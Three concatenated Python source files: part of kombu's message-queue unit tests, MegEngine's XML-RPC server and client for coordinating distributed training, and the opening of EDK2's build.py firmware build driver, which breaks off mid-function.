is_bound=True, can_cache_declaration=True)
entity.channel = channel
entity.auto_delete = False
assert entity.is_bound, "Expected entity is bound to begin this test."
# When: Calling maybe_declare default
maybe_declare(entity, channel)
# Then: It called declare on the entity queue and added it to list
assert entity.declare.call_count == 1
assert hash(entity) in channel.connection.client.declared_entities
# When: Calling maybe_declare default (again)
maybe_declare(entity, channel)
# Then: we did not call declare again because it's already in our list
assert entity.declare.call_count == 1
# When: Entity channel connection has gone away
entity.channel.connection = None
# Then: maybe_declare must raise a RecoverableConnectionError
with pytest.raises(RecoverableConnectionError):
maybe_declare(entity)
def test_binds_entities(self):
# Given: A mock Channel and mock entity
channel = self._get_mock_channel()
# Given: A mock Entity that is not bound
entity = self._get_mock_entity()
assert not entity.is_bound, "Expected entity unbound to begin test."
# When: calling maybe_declare with default of no retry policy
maybe_declare(entity, channel)
# Then: the entity is now bound because it called to bind it
assert entity.is_bound is True, "Expected entity is now marked bound."
def test_binds_entities_when_retry_policy(self):
# Given: A mock Channel and mock entity
channel = self._get_mock_channel()
# Given: A mock Entity that is not bound
entity = self._get_mock_entity()
assert not entity.is_bound, "Expected entity unbound to begin test."
# Given: A retry policy
sample_retry_policy = {
'interval_start': 0,
'interval_max': 1,
'max_retries': 3,
'interval_step': 0.2,
'errback': lambda x: "Called test errback retry policy",
}
# When: calling maybe_declare with retry enabled
maybe_declare(entity, channel, retry=True, **sample_retry_policy)
# Then: the entity is now bound because it called to bind it
assert entity.is_bound is True, "Expected entity is now marked bound."
def test_with_retry(self):
# Given: A mock Channel and mock entity
channel = self._get_mock_channel()
# Given: A mock Entity that is already bound
entity = self._get_mock_entity(
is_bound=True, can_cache_declaration=True)
entity.channel = channel
assert entity.is_bound, "Expected entity is bound to begin this test."
# When calling maybe_declare with retry enabled (default policy)
maybe_declare(entity, channel, retry=True)
# Then: the connection client used ensure to ensure the retry policy
assert channel.connection.client.ensure.call_count
def test_with_retry_dropped_connection(self):
# Given: A mock Channel and mock entity
channel = self._get_mock_channel()
# Given: A mock Entity that is already bound
entity = self._get_mock_entity(
is_bound=True, can_cache_declaration=True)
entity.channel = channel
assert entity.is_bound, "Expected entity is bound to begin this test."
# When: Entity channel connection has gone away
entity.channel.connection = None
# When: calling maybe_declare with retry
# Then: the RecoverableConnectionError should be raised
with pytest.raises(RecoverableConnectionError):
maybe_declare(entity, channel, retry=True)
class test_replies:
def test_send_reply(self):
req = Mock()
req.content_type = 'application/json'
req.content_encoding = 'binary'
req.properties = {'reply_to': 'hello',
'correlation_id': 'world'}
channel = Mock()
exchange = Mock()
exchange.is_bound = True
exchange.channel = channel
producer = Mock()
producer.channel = channel
producer.channel.connection.client.declared_entities = set()
send_reply(exchange, req, {'hello': 'world'}, producer)
assert producer.publish.call_count
args = producer.publish.call_args
assert args[0][0] == {'hello': 'world'}
assert args[1] == {
'exchange': exchange,
'routing_key': 'hello',
'correlation_id': 'world',
'serializer': 'json',
'retry': False,
'retry_policy': None,
'content_encoding': 'binary',
}
@patch('kombu.common.itermessages')
def test_collect_replies_with_ack(self, itermessages):
conn, channel, queue = Mock(), Mock(), Mock()
body, message = Mock(), Mock()
itermessages.return_value = [(body, message)]
it = collect_replies(conn, channel, queue, no_ack=False)
m = next(it)
assert m is body
itermessages.assert_called_with(conn, channel, queue, no_ack=False)
message.ack.assert_called_with()
with pytest.raises(StopIteration):
next(it)
channel.after_reply_message_received.assert_called_with(queue.name)
@patch('kombu.common.itermessages')
def test_collect_replies_no_ack(self, itermessages):
conn, channel, queue = Mock(), Mock(), Mock()
body, message = Mock(), Mock()
itermessages.return_value = [(body, message)]
it = collect_replies(conn, channel, queue)
m = next(it)
assert m is body
itermessages.assert_called_with(conn, channel, queue, no_ack=True)
message.ack.assert_not_called()
@patch('kombu.common.itermessages')
def test_collect_replies_no_replies(self, itermessages):
conn, channel, queue = Mock(), Mock(), Mock()
itermessages.return_value = []
it = collect_replies(conn, channel, queue)
with pytest.raises(StopIteration):
next(it)
channel.after_reply_message_received.assert_not_called()
class test_insured:
@patch('kombu.common.logger')
def test_ensure_errback(self, logger):
common._ensure_errback('foo', 30)
logger.error.assert_called()
def test_revive_connection(self):
on_revive = Mock()
channel = Mock()
common.revive_connection(Mock(), channel, on_revive)
on_revive.assert_called_with(channel)
common.revive_connection(Mock(), channel, None)
def get_insured_mocks(self, insured_returns=('works', 'ignored')):
conn = ContextMock()
pool = MockPool(conn)
fun = Mock()
insured = conn.autoretry.return_value = Mock()
insured.return_value = insured_returns
return conn, pool, fun, insured
def test_insured(self):
conn, pool, fun, insured = self.get_insured_mocks()
ret = common.insured(pool, fun, (2, 2), {'foo': 'bar'})
assert ret == 'works'
conn.ensure_connection.assert_called_with(
errback=common._ensure_errback,
)
insured.assert_called()
i_args, i_kwargs = insured.call_args
assert i_args == (2, 2)
assert i_kwargs == {'foo': 'bar', 'connection': conn}
conn.autoretry.assert_called()
ar_args, ar_kwargs = conn.autoretry.call_args
assert ar_args == (fun, conn.default_channel)
assert ar_kwargs.get('on_revive')
assert ar_kwargs.get('errback')
def test_insured_custom_errback(self):
conn, pool, fun, insured = self.get_insured_mocks()
custom_errback = Mock()
common.insured(pool, fun, (2, 2), {'foo': 'bar'},
errback=custom_errback)
conn.ensure_connection.assert_called_with(errback=custom_errback)
class MockConsumer:
consumers = set()
def __init__(self, channel, queues=None, callbacks=None, **kwargs):
self.channel = channel
self.queues = queues
self.callbacks = callbacks
def __enter__(self):
self.consumers.add(self)
return self
def __exit__(
self,
exc_type: type[BaseException] | None,
exc_val: BaseException | None,
exc_tb: TracebackType | None
) -> None:
self.consumers.discard(self)
class test_itermessages:
class MockConnection:
should_raise_timeout = False
def drain_events(self, **kwargs):
if self.should_raise_timeout:
raise socket.timeout()
for consumer in MockConsumer.consumers:
for callback in consumer.callbacks:
callback('body', 'message')
def test_default(self):
conn = self.MockConnection()
channel = Mock()
channel.connection.client = conn
conn.Consumer = MockConsumer
it = common.itermessages(conn, channel, 'q', limit=1)
ret = next(it)
assert ret == ('body', 'message')
with pytest.raises(StopIteration):
next(it)
def test_when_raises_socket_timeout(self):
conn = self.MockConnection()
conn.should_raise_timeout = True
channel = Mock()
channel.connection.client = conn
conn.Consumer = MockConsumer
it = common.itermessages(conn, channel, 'q', limit=1)
with pytest.raises(StopIteration):
next(it)
@patch('kombu.common.deque')
def test_when_raises_IndexError(self, deque):
deque_instance = deque.return_value = Mock()
deque_instance.popleft.side_effect = IndexError()
conn = self.MockConnection()
channel = Mock()
conn.Consumer = MockConsumer
it = common.itermessages(conn, channel, 'q', limit=1)
with pytest.raises(StopIteration):
next(it)
class test_QoS:
class _QoS(QoS):
def __init__(self, value):
self.value = value
super().__init__(None, value)
def set(self, value):
return value
def test_qos_exceeds_16bit(self):
with patch('kombu.common.logger') as logger:
callback = Mock()
qos = QoS(callback, 10)
qos.prev = 100
# cannot use 2 ** 32 because of a bug on macOS Py2.5:
# https://jira.mongodb.org/browse/PYTHON-389
qos.set(4294967296)
logger.warning.assert_called()
callback.assert_called_with(prefetch_count=0)
def test_qos_increment_decrement(self):
qos = self._QoS(10)
assert qos.increment_eventually() == 11
assert qos.increment_eventually(3) == 14
assert qos.increment_eventually(-30) == 14
assert qos.decrement_eventually(7) == 7
assert qos.decrement_eventually() == 6
def test_qos_disabled_increment_decrement(self):
qos = self._QoS(0)
assert qos.increment_eventually() == 0
assert qos.increment_eventually(3) == 0
assert qos.increment_eventually(-30) == 0
assert qos.decrement_eventually(7) == 0
assert qos.decrement_eventually() == 0
assert qos.decrement_eventually(10) == 0
def test_qos_thread_safe(self):
qos = self._QoS(10)
def add():
for i in range(1000):
qos.increment_eventually()
def sub():
for i in range(1000):
qos.decrement_eventually()
def threaded(funs):
from threading import Thread
threads = [Thread(target=fun) for fun in funs]
for thread in threads:
thread.start()
for thread in threads:
thread.join()
threaded([add, add])
assert qos.value == 2010
qos.value = 1000
threaded([add, sub]) # n = 2
assert qos.value == 1000
def test_exceeds_short(self):
qos = QoS(Mock(), PREFETCH_COUNT_MAX - 1)
qos.update()
assert qos.value == PREFETCH_COUNT_MAX - 1
qos.increment_eventually()
assert qos.value == PREFETCH_COUNT_MAX
qos.increment_eventually()
assert qos.value == PREFETCH_COUNT_MAX + 1
qos.decrement_eventually()
assert qos.value == PREFETCH_COUNT_MAX
qos.decrement_eventually()
assert qos.value == PREFETCH_COUNT_MAX - 1
def test_consumer_increment_decrement(self):
mconsumer = Mock()
qos = QoS(mconsumer.qos, 10)
qos.update()
assert qos.value == 10
mconsumer.qos.assert_called_with(prefetch_count=10)
qos.decrement_eventually()
qos.update()
assert qos.value == 9
mconsumer.qos.assert_called_with(prefetch_count=9)
qos.decrement_eventually()
assert qos.value == 8
mconsumer.qos.assert_called_with(prefetch_count=9)
assert {'prefetch_count': 9} in mconsumer.qos.call_args
# Does not decrement 0 value
qos.value = 0
qos.decrement_eventually()
assert qos.value == 0
qos.increment_eventually()
assert qos.value == 0
def test_consumer_decrement_eventually(self):
mconsumer = Mock()
qos = QoS(mconsumer.qos, 10)
qos.decrement_eventually()
assert qos.value == 9
qos.value = 0
qos.decrement_eventually()
assert qos.value == 0
def test_set(self):
mconsumer = Mock()
qos = QoS(mconsumer.qos, 10)
qos.set(12)
assert qos.prev == 12
qos.set(qos.prev)
|
server.py
|
# -*- coding: utf-8 -*-
# MegEngine is Licensed under the Apache License, Version 2.0 (the "License")
#
# Copyright (c) 2014-2021 Megvii Inc. All rights reserved.
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT ARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
import multiprocessing as mp
import threading
import time
from collections import defaultdict
from functools import partial
from socketserver import ThreadingMixIn
from xmlrpc.client import ServerProxy
from xmlrpc.server import SimpleXMLRPCServer
from ..core._imperative_rt.utils import create_mm_server
from ..utils.future import Future
class Methods:
"""
Distributed server methods.
Used to exchange information between distributed nodes.
:param mm_server_port: multiple machine rpc server port.
"""
def __init__(self, mm_server_port):
self.lock = threading.Lock()
self.mm_server_port = mm_server_port
self.dict_is_grad = defaultdict(partial(Future, True))
self.dict_remote_tracer = defaultdict(partial(Future, True))
self.dict_pack_list = defaultdict(partial(Future, False))
self.dict_barrier_counter = defaultdict(int)
self.dict_barrier_event = defaultdict(threading.Event)
self.user_dict = defaultdict(partial(Future, False))
self.bcast_dict = {}
def connect(self):
"""Method for checking connection success."""
return True
def get_mm_server_port(self):
"""Get multiple machine rpc server port."""
return self.mm_server_port
def set_is_grad(self, key, is_grad):
"""
Mark whether the send/recv op matched by key needs gradients.
:param key: key to match send/recv op.
:param is_grad: whether this op needs grad.
"""
with self.lock:
future = self.dict_is_grad[key]
future.set(is_grad)
return True
def check_is_grad(self, key):
"""
Check whether a send/recv op needs gradients.
:param key: key to match send/recv op.
"""
with self.lock:
future = self.dict_is_grad[key]
ret = future.get()
with self.lock:
del self.dict_is_grad[key]
return ret
def set_remote_tracer(self, key, tracer_set):
"""
Set tracer dict for tracing send/recv op.
:param key: key to match send/recv op.
:param tracer_set: valid tracer set.
"""
with self.lock:
future = self.dict_remote_tracer[key]
future.set(tracer_set)
return True
def check_remote_tracer(self, key):
"""
Get tracer dict for send/recv op.
:param key: key to match send/recv op.
"""
with self.lock:
future = self.dict_remote_tracer[key]
ret = future.get()
with self.lock:
del self.dict_remote_tracer[key]
return ret
def group_barrier(self, key, size):
"""
A barrier that waits for all group members.
:param key: group key to match each other.
:param size: group size.
"""
with self.lock:
self.dict_barrier_counter[key] += 1
counter = self.dict_barrier_counter[key]
event = self.dict_barrier_event[key]
if counter == size:
del self.dict_barrier_counter[key]
del self.dict_barrier_event[key]
event.set()
else:
event.wait()
return True
def user_set(self, key, val):
"""Set user defined key-value pairs across processes."""
with self.lock:
future = self.user_dict[key]
future.set(val)
return True
def user_get(self, key):
"""Get user defined key-value pairs across processes."""
with self.lock:
future = self.user_dict[key]
return future.get()
def bcast_val(self, val, key, size):
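"""
Broadcast a value to a group of callers matched by key.
A sketch of the protocol as implemented below: the one caller that passes a
non-None val fulfils the shared future; every other caller blocks on it and
receives the value. Each call decrements the group counter, and the last
caller removes the entry.
:param val: value to broadcast, or None to receive the broadcast value.
:param key: key to match the broadcast group.
:param size: number of callers in the group.
"""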
with self.lock:
if key not in self.bcast_dict:
self.bcast_dict[key] = [Future(False), size]
arr = self.bcast_dict[key]
if val is not None:
arr[0].set(val)
val = None
else:
val = arr[0].get()
with self.lock:
cnt = arr[1] - 1
arr[1] = cnt
if cnt == 0:
del self.bcast_dict[key]
return val
def _del(self, key):
with self.lock:
del self.user_dict[key]
# Thread-safe helper: fetch the value, then delete the underlying future.
def user_pop(self, key):
ret = self.user_get(key)
self._del(key)
return ret
class ThreadXMLRPCServer(ThreadingMixIn, SimpleXMLRPCServer):
pass
def _start_server(py_server_port, queue):
"""
Start the python distributed server and the multiple machine server.
:param py_server_port: python server port (0 picks a free port).
:param queue: the chosen (py_server_port, mm_server_port) pair is put in this
queue; an exception is put instead when the process fails.
"""
try:
mm_server_port = create_mm_server("0.0.0.0", 0)
server = ThreadXMLRPCServer(
("0.0.0.0", py_server_port), logRequests=False, allow_none=True
)
server.register_instance(Methods(mm_server_port))
_, py_server_port = server.server_address
queue.put((py_server_port, mm_server_port))
server.serve_forever()
except Exception as e:
queue.put(e)
class Server:
"""
Distributed Server for distributed training.
Should run on the master node.
:param port: python server port.
"""
def __init__(self, port=0):
q = mp.Queue()
self.proc = mp.Process(target=_start_server, args=(port, q), daemon=True)
self.proc.start()
ret = q.get()
if isinstance(ret, Exception):
raise ret
else:
self.py_server_port, self.mm_server_port = ret
def __del__(self):
self.proc.terminate()
class Client:
"""
Distributed Client for distributed training.
:param master_ip: ip address of master node.
:param port: port of server at master node.
"""
def __init__(self, master_ip, port):
self.master_ip = master_ip
self.port = port
self.connect()
self.bcast_dict = defaultdict(lambda: 0)
def connect(self):
"""Check connection success."""
while True:
try:
self.proxy = ServerProxy(
"http://{}:{}".format(self.master_ip, self.port), allow_none=True
)
if self.proxy.connect():
break
except Exception:
time.sleep(1)
def get_mm_server_port(self):
"""Get multiple machine server port."""
return self.proxy.get_mm_server_port()
def set_is_grad(self, key, is_grad):
"""
Mark whether the send/recv op matched by key needs gradients.
:param key: key to match send/recv op.
:param is_grad: whether this op needs grad.
"""
self.proxy.set_is_grad(key, is_grad)
def check_is_grad(self, key):
"""
Check whether a send/recv op needs gradients.
:param key: key to match send/recv op.
"""
return self.proxy.check_is_grad(key)
def set_remote_tracer(self, key, tracer_set):
"""
Set tracer dict for tracing send/recv op.
:param key: key to match send/recv op.
:param tracer_set: valid tracer set.
"""
self.proxy.set_remote_tracer(key, tracer_set)
def check_remote_tracer(self, key):
"""
Get tracer dict for send/recv op.
:param key: key to match send/recv op.
"""
return self.proxy.check_remote_tracer(key)
def group_barrier(self, key, size):
"""
A barrier that waits for all group members.
:param key: group key to match each other.
:param size: group size.
"""
self.proxy.group_barrier(key, size)
def user_set(self, key, val):
"""Set user defined key-value pairs across processes."""
return self.proxy.user_set(key, val)
def user_get(self, key):
"""Get user defined key-value pairs across processes."""
return self.proxy.user_get(key)
def user_pop(self, key):
"""Get user defined key-value pairs and delete the resources when the get is done"""
return self.proxy.user_pop(key)
def bcast_val(self, val, key, size):
idx = self.bcast_dict[key] + 1
self.bcast_dict[key] = idx
key = key + "_bcast_" + str(idx)
return self.proxy.bcast_val(val, key, size)
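# A minimal usage sketch (addresses and sizes are hypothetical): the master
# process starts a Server; each worker connects a Client and can then use the
# key-value helpers and the barrier:
#
# server = Server()  # on the master node
# client = Client("127.0.0.1", server.py_server_port)  # on each worker
# client.user_set("world_size", 4)
# assert client.user_get("world_size") == 4
# client.group_barrier("init", 4)  # returns once 4 workers have arrived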
def main(port=0, verbose=True):
mm_server_port = create_mm_server("0.0.0.0", 0)
server = ThreadXMLRPCServer(("0.0.0.0", port), logRequests=verbose)
server.register_instance(Methods(mm_server_port))
_, port = server.server_address
print("serving on port", port)
server.serve_forever()
if __name__ == "__main__":
import argparse
ap = argparse.ArgumentParser()
ap.add_argument("-p", "--port", type=int, default=0)
ap.add_argument("-v", "--verbose", type=bool, default=True)
args = ap.parse_args()
main(port=args.port, verbose=args.verbose)
|
build.py
|
## @file
# build a platform or a module
#
# Copyright (c) 2014, Hewlett-Packard Development Company, L.P.<BR>
# Copyright (c) 2007 - 2019, Intel Corporation. All rights reserved.<BR>
# Copyright (c) 2018, Hewlett Packard Enterprise Development, L.P.<BR>
#
# SPDX-License-Identifier: BSD-2-Clause-Patent
#
##
# Import Modules
#
from __future__ import print_function
import Common.LongFilePathOs as os
import re
import sys
import glob
import time
import platform
import traceback
import encodings.ascii
import multiprocessing
from struct import *
from threading import *
import threading
from optparse import OptionParser
from subprocess import *
from Common import Misc as Utils
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.TargetTxtClassObject import TargetTxtClassObject
from Common.ToolDefClassObject import ToolDefClassObject
from Common.DataType import *
from Common.BuildVersion import gBUILD_VERSION
from AutoGen.AutoGen import *
from Common.BuildToolError import *
from Workspace.WorkspaceDatabase import WorkspaceDatabase
from Common.MultipleWorkspace import MultipleWorkspace as mws
from BuildReport import BuildReport
from GenPatchPcdTable.GenPatchPcdTable import *
from PatchPcdValue.PatchPcdValue import *
import Common.EdkLogger
import Common.GlobalData as GlobalData
from GenFds.GenFds import GenFds, GenFdsApi
from collections import OrderedDict, defaultdict
# Version and Copyright
VersionNumber = "0.60" + ' ' + gBUILD_VERSION
__version__ = "%prog Version " + VersionNumber
__copyright__ = "Copyright (c) 2007 - 2018, Intel Corporation All rights reserved."
## standard targets of build command
gSupportedTarget = ['all', 'genc', 'genmake', 'modules', 'libraries', 'fds', 'clean', 'cleanall', 'cleanlib', 'run']
## build configuration file
gBuildConfiguration = "target.txt"
gToolsDefinition = "tools_def.txt"
TemporaryTablePattern = re.compile(r'^_\d+_\d+_[a-fA-F0-9]+$')
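# For illustration, TemporaryTablePattern matches generated names such as
# "_123_0_5f8a9c" (an assumed example; the real names are produced elsewhere in
# BaseTools).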
TmpTableDict = {}
## Check environment PATH variable to make sure the specified tool is found
#
# If the tool is found in the PATH, then True is returned
# Otherwise, False is returned
#
def IsToolInPath(tool):
if 'PATHEXT' in os.environ:
extns = os.environ['PATHEXT'].split(os.path.pathsep)
else:
extns = ('',)
for pathDir in os.environ['PATH'].split(os.path.pathsep):
for ext in extns:
if os.path.exists(os.path.join(pathDir, tool + ext)):
return True
return False
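# For example, IsToolInPath("make") is True on a typical Linux host where
# /usr/bin/make exists; on Windows, PATHEXT lets IsToolInPath("nmake") match
# nmake.exe as well (a sketch; results depend on the local environment).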
## Check environment variables
#
# Check environment variables that must be set for build. Currently they are
#
# WORKSPACE The directory all packages/platforms start from
# EDK_TOOLS_PATH The directory containing all tools needed by the build
# PATH $(EDK_TOOLS_PATH)/Bin/<sys> must be set in PATH
#
# If any of the above environment variables is not set or is invalid, the
# build will be broken.
#
def CheckEnvVariable():
# check WORKSPACE
if "WORKSPACE" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="WORKSPACE")
WorkspaceDir = os.path.normcase(os.path.normpath(os.environ["WORKSPACE"]))
if not os.path.exists(WorkspaceDir):
EdkLogger.error("build", FILE_NOT_FOUND, "WORKSPACE doesn't exist", ExtraData=WorkspaceDir)
elif ' ' in WorkspaceDir:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in WORKSPACE path",
ExtraData=WorkspaceDir)
os.environ["WORKSPACE"] = WorkspaceDir
# set multiple workspace
PackagesPath = os.getenv("PACKAGES_PATH")
mws.setWs(WorkspaceDir, PackagesPath)
if mws.PACKAGES_PATH:
for Path in mws.PACKAGES_PATH:
if not os.path.exists(Path):
EdkLogger.error("build", FILE_NOT_FOUND, "One Path in PACKAGES_PATH doesn't exist", ExtraData=Path)
elif ' ' in Path:
EdkLogger.error("build", FORMAT_NOT_SUPPORTED, "No space is allowed in PACKAGES_PATH", ExtraData=Path)
os.environ["EDK_TOOLS_PATH"] = os.path.normcase(os.environ["EDK_TOOLS_PATH"])
# check EDK_TOOLS_PATH
if "EDK_TOOLS_PATH" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="EDK_TOOLS_PATH")
# check PATH
if "PATH" not in os.environ:
EdkLogger.error("build", ATTRIBUTE_NOT_AVAILABLE, "Environment variable not found",
ExtraData="PATH")
GlobalData.gWorkspace = WorkspaceDir
GlobalData.gGlobalDefines["WORKSPACE"] = WorkspaceDir
GlobalData.gGlobalDefines["EDK_TOOLS_PATH"] = os.environ["EDK_TOOLS_PATH"]
## Get normalized file path
#
# Convert the path to local format, and remove the WORKSPACE path at the
# beginning if the file path is given in full path.
#
# @param FilePath File path to be normalized
# @param Workspace Workspace path which the FilePath will be checked against
#
# @retval string The normalized file path
#
def NormFile(FilePath, Workspace):
# check if the path is absolute or relative
if os.path.isabs(FilePath):
FileFullPath = os.path.normpath(FilePath)
else:
FileFullPath = os.path.normpath(mws.join(Workspace, FilePath))
Workspace = mws.getWs(Workspace, FilePath)
# check if the file path exists or not
if not os.path.isfile(FileFullPath):
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData="\t%s (Please give file in absolute path or relative to WORKSPACE)" % FileFullPath)
# remove workspace directory from the beginning part of the file path
if Workspace[-1] in ["\\", "/"]:
return FileFullPath[len(Workspace):]
else:
return FileFullPath[(len(Workspace) + 1):]
## Get the output of an external program
#
# This is the entry method of the thread that reads the output of an external
# program and puts it into the STDOUT/STDERR of the current program.
#
# @param From The stream message read from
# @param To The stream message put on
# @param ExitFlag The flag used to indicate stopping reading
#
def ReadMessage(From, To, ExitFlag):
while True:
# read one line at a time
Line = From.readline()
# empty string means "end"
if Line is not None and Line != b"":
To(Line.rstrip().decode(encoding='utf-8', errors='ignore'))
else:
break
if ExitFlag.isSet():
break
## Launch an external program
#
# This method will call subprocess.Popen to execute an external program with
# given options in specified directory. Because of the dead-lock issue during
# redirecting output of the external program, threads are used to do the
# redirection work.
#
# @param Command A list or string containing the call of the program
# @param WorkingDir The directory in which the program will be running
#
def LaunchCommand(Command, WorkingDir):
BeginTime = time.time()
# if working directory doesn't exist, Popen() will raise an exception
if not os.path.isdir(WorkingDir):
EdkLogger.error("build", FILE_NOT_FOUND, ExtraData=WorkingDir)
# Command is used as the first argument in the following Popen().
# It could be a string or a sequence. We found that if Command is a string,
# Popen() on Ubuntu may fail with an error saying the command is not found.
# So here we may need to convert Command from a string to a list.
if platform.system() != 'Windows':
if not isinstance(Command, list):
Command = Command.split()
Command = ' '.join(Command)
Proc = None
EndOfProcedure = None
try:
# launch the command
Proc = Popen(Command, stdout=PIPE, stderr=PIPE, env=os.environ, cwd=WorkingDir, bufsize=-1, shell=True)
# launch two threads to read the STDOUT and STDERR
EndOfProcedure = Event()
EndOfProcedure.clear()
if Proc.stdout:
StdOutThread = Thread(target=ReadMessage, args=(Proc.stdout, EdkLogger.info, EndOfProcedure))
StdOutThread.setName("STDOUT-Redirector")
StdOutThread.setDaemon(False)
StdOutThread.start()
if Proc.stderr:
StdErrThread = Thread(target=ReadMessage, args=(Proc.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
Proc.wait()
except: # in case of aborting
# terminate the threads redirecting the program output
EdkLogger.quiet("(Python %s on %s) " % (platform.python_version(), sys.platform) + traceback.format_exc())
if EndOfProcedure is not None:
EndOfProcedure.set()
if Proc is None:
if not isinstance(Command, type("")):
Command = " ".join(Command)
EdkLogger.error("build", COMMAND_FAILURE, "Failed to start command", ExtraData="%s [%s]" % (Command, WorkingDir))
if Proc.stdout:
StdOutThread.join()
if Proc.stderr:
StdErrThread.join()
# check the return code of the program
if Proc.returncode != 0:
if not isinstance(Command, type("")):
Command = " ".join(Command)
# print out the Response file and its content when make failure
RespFile = os.path.join(WorkingDir, 'OUTPUT', 'respfilelist.txt')
if os.path.isfile(RespFile):
f = open(RespFile)
RespContent = f.read()
f.close()
EdkLogger.info(RespContent)
EdkLogger.error("build", COMMAND_FAILURE, ExtraData="%s [%s]" % (Command, WorkingDir))
return "%dms" % (int(round((time.time() - BeginTime) * 1000)))
## The smallest unit that can be built in multi-thread build mode
#
# This is the base class of build unit. The "Obj" parameter must provide
# __str__(), __eq__() and __hash__() methods. Otherwise some build units could
# be missed during the build.
#
# Currently the "Obj" should be only ModuleAutoGen or PlatformAutoGen objects.
#
class BuildUnit:
## The constructor
#
# @param self The object pointer
# @param Obj The object the build is working on
# @param Target The build target name, one of gSupportedTarget
# @param Dependency The BuildUnit(s) which must be completed in advance
# @param WorkingDir The directory build command starts in
#
def __init__(self, Obj, BuildCommand, Target, Dependency, WorkingDir="."):
self.BuildObject = Obj
self.Dependency = Dependency
self.WorkingDir = WorkingDir
self.Target = Target
self.BuildCommand = BuildCommand
if not BuildCommand:
EdkLogger.error("build", OPTION_MISSING,
"No build command found for this module. "
"Please check your setting of %s_%s_%s_MAKE_PATH in Conf/tools_def.txt file." %
(Obj.BuildTarget, Obj.ToolChain, Obj.Arch),
ExtraData=str(Obj))
## str() method
#
# It just returns the string representation of self.BuildObject
#
# @param self The object pointer
#
def __str__(self):
return str(self.BuildObject)
## "==" operator method
#
# It just compares self.BuildObject with "Other". So self.BuildObject must
# provide its own __eq__() method.
#
# @param self The object pointer
# @param Other The other BuildUnit object compared to
#
def __eq__(self, Other):
return Other and self.BuildObject == Other.BuildObject \
and Other.BuildObject \
and self.BuildObject.Arch == Other.BuildObject.Arch
## hash() method
#
# It just returns the hash value of self.BuildObject which must be hashable.
#
# @param self The object pointer
#
def __hash__(self):
return hash(self.BuildObject) + hash(self.BuildObject.Arch)
def __repr__(self):
return repr(self.BuildObject)
## The smallest module unit that can be built by nmake/make command in multi-thread build mode
#
# This class is for module build by nmake/make build system. The "Obj" parameter
# must provide __str__(), __eq__() and __hash__() methods. Otherwise some make
# units could be missed during the build.
#
# Currently the "Obj" should be only ModuleAutoGen object.
#
class ModuleMakeUnit(BuildUnit):
## The constructor
#
# @param self The object pointer
# @param Obj The ModuleAutoGen object the build is working on
# @param Target The build target name, one of gSupportedTarget
#
def __init__(self, Obj, Target):
Dependency = [ModuleMakeUnit(La, Target) for La in Obj.LibraryAutoGenList]
BuildUnit.__init__(self, Obj, Obj.BuildCommand, Target, Dependency, Obj.MakeFileDir)
if Target in [None, "", "all"]:
self.Target = "tbuild"
## The smallest platform unit that can be built by nmake/make command in multi-thread build mode
#
# This class is for platform build by nmake/make build system. The "Obj" parameter
# must provide __str__(), __eq__() and __hash__() methods. Otherwise some make
# units could be missed during the build.
#
# Currently the "Obj" should be only PlatformAutoGen object.
#
class PlatformMakeUnit(BuildUnit):
## The constructor
#
# @param self The object pointer
# @param Obj The PlatformAutoGen object the build is working on
# @param Target The build target name, one of gSupportedTarget
#
def __init__(self, Obj, Target):
Dependency = [ModuleMakeUnit(Lib, Target) for Lib in Obj.LibraryAutoGenList]
Dependency.extend([ModuleMakeUnit(Mod, Target) for Mod in Obj.ModuleAutoGenList])
BuildUnit.__init__(self, Obj, Obj.BuildCommand, Target, Dependency, Obj.MakeFileDir)
## The class representing the task of a module build or platform build
#
# This class manages the build tasks in multi-thread build mode. Its jobs include
# scheduling threads, catching thread errors, monitoring thread status, etc.
#
class BuildTask:
# queue for tasks waiting to be scheduled
_PendingQueue = OrderedDict()
_PendingQueueLock = threading.Lock()
# queue for tasks ready for running
_ReadyQueue = OrderedDict()
_ReadyQueueLock = threading.Lock()
# queue for running tasks
_RunningQueue = OrderedDict()
_RunningQueueLock = threading.Lock()
# queue containing all build tasks, to avoid duplicate builds
_TaskQueue = OrderedDict()
# flag indicating error occurs in a running thread
_ErrorFlag = threading.Event()
_ErrorFlag.clear()
_ErrorMessage = ""
# BoundedSemaphore object used to control the number of running threads
_Thread = None
# flag indicating if the scheduler is started or not
_SchedulerStopped = threading.Event()
_SchedulerStopped.set()
## Start the task scheduler thread
#
# @param MaxThreadNumber The maximum thread number
# @param ExitFlag Flag used to end the scheduler
#
@staticmethod
def StartScheduler(MaxThreadNumber, ExitFlag):
SchedulerThread = Thread(target=BuildTask.Scheduler, args=(MaxThreadNumber, ExitFlag))
SchedulerThread.setName("Build-Task-Scheduler")
SchedulerThread.setDaemon(False)
SchedulerThread.start()
# wait for the scheduler to be started, especially useful in Linux
while not BuildTask.IsOnGoing():
time.sleep(0.01)
## Scheduler method
#
# @param MaxThreadNumber The maximum thread number
# @param ExitFlag Flag used to end the scheduler
#
@staticmethod
def Scheduler(MaxThreadNumber, ExitFlag):
BuildTask._SchedulerStopped.clear()
try:
# use BoundedSemaphore to control the maximum running threads
BuildTask._Thread = BoundedSemaphore(MaxThreadNumber)
#
# scheduling loop, which exits when there is no pending/ready task and it
# is told to do so, or when there's an error in a running thread
#
while (len(BuildTask._PendingQueue) > 0 or len(BuildTask._ReadyQueue) > 0 \
or not ExitFlag.isSet()) and not BuildTask._ErrorFlag.isSet():
EdkLogger.debug(EdkLogger.DEBUG_8, "Pending Queue (%d), Ready Queue (%d)"
% (len(BuildTask._PendingQueue), len(BuildTask._ReadyQueue)))
# get all pending tasks
BuildTask._PendingQueueLock.acquire()
BuildObjectList = list(BuildTask._PendingQueue.keys())
#
# check if their dependency is resolved, and if true, move them
# into ready queue
#
for BuildObject in BuildObjectList:
Bt = BuildTask._PendingQueue[BuildObject]
if Bt.IsReady():
BuildTask._ReadyQueue[BuildObject] = BuildTask._PendingQueue.pop(BuildObject)
BuildTask._PendingQueueLock.release()
# launch build thread until the maximum number of threads is reached
